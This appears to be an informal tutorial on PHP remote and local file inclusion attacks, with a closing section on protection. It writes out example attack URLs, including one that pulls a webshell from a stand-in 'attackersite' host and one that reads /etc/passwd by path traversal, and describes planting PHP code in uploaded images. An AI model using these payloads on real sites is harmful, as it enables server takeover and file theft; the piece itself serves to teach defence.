WHAT AND HOW?

Whole method is actually called FI which means file include,only difference is in the place of included files.RFI stands for remote file inclusion which means that files are included from remote server and LFI stands for local file inclusion which means that only local files (files on the same server can be included)Don't be fooled by the thing that only local files can be included,its pretty dangerous attack also if you consider the fact the php code can be injected inside images and can be loaded via LFI,also the fact that someone  can load any file from your server is

dangerous enough.I need to mention one more thing that most of the RFI and LFI vulnerabilities are results of bad programing by people who don't know much about security

THE ATTACK

For the start let me explain you the remote file include because you will get bigger picture later when i start explaining the Local one.Take for example that you have some website www.mywebsite.com/index.php?news=latest
Now notice the end of url where „latest“ is included.Latest is actually „latest.php“but extension is not showed on most websites.What would happen on the vulnerable website if we try to include for example google.com instead of the latest?Example url would look like this:
www.mywebsite.com/index.php?news=http://www.google.com this url instead of showing the latest news will redirect you to google website.So you will probably say now „what if they redirect there is nothing dangerous in that “You are not quite right there and u know why ?take a look at the next example and  you will figure.Lets assume that instead of google's website we include some file that is on another server like www.mywebsite.com/index.php?news=http://www.attackersite.com/hacked.txt
now instead of your website showing the latest news your website will show the file called „hacked.txt“ instead.If we assume that hacked.txt contains for example some malicious code like webshell only thing that should be added on the end of the above url is (?) so it would look like this www.mywebsite.com/index.php?news=http://www.attackersite.com/hacked.txt?
What will happen now is that webshell script that is on the attacker's server will be inluded And executed on your server giving him access to your files and opportunity to upload that code on your server for later access and you don't want that to happen.Now that you understand the basics of the RFI let me explain the LFI method.As i already said it consider reading and including local files and i will use same example from above and try to read /etc/passwd.The url will look like this
www.mywebsite.com/index.php?news=../etc/passwd and your passwd file is loaded for anyone to read.Now just reading files is not what makes this method so dangrous but there is other thing,other possible scenario.What if somewhere on your website you have some  upload form for uploading pictures,txt files and other things needed.Attacker could simply upload picture with php code injected there.Example picture which will contain code of the webshell.If you open that picture normally you will see the picture but if that picture is loaded via LFI vuln no picture will be there it will only execute the code from it.So all attacker need to do is to load infected picture in the way i described for /etc/passwd and he have shell on your server.Pretty dangerous ha?

PROTECTION

Main thing that will save u from File include is to specify exact location of the files so or the right file is loaded or the script will abort and redirect somewhere.That is working against both RFI and LFI attacks.Also important thing is to diable php functions like allow_url_fopen and allow_url_include.If for some reason u need to use include() function u should specify name of the file that should be included and its location instead of grabbing that content of $GET,so when including script will check if file has the right name and if its included from specified location and abort if wrong name or location.Also for RFI u will notice that every url starts with http or www. So u should disable this or filter it.U can do this in htaccess by specifying that if there is included anything that start with www or http it redirect to some dummy file u create for those purposes.Hope that now you understand danger of those attacks and that u have better understanding on how to protect yourself from them